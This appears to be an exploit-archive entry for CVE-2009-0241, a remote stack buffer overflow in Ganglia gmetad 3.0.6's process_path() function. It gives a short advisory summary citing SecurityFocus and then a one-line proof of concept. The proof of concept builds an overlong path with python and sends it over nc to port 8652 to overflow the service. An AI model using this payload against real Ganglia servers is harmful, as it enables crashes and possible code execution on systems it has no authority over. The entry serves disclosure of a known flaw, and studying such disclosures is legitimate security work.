Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow

Related Vulnerabilities: CVE-2009-0241  
Publish Date: 15 Jan 2009
                							

                source: http://www.securityfocus.com/bid/33299/info

Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input.

Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions.

echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652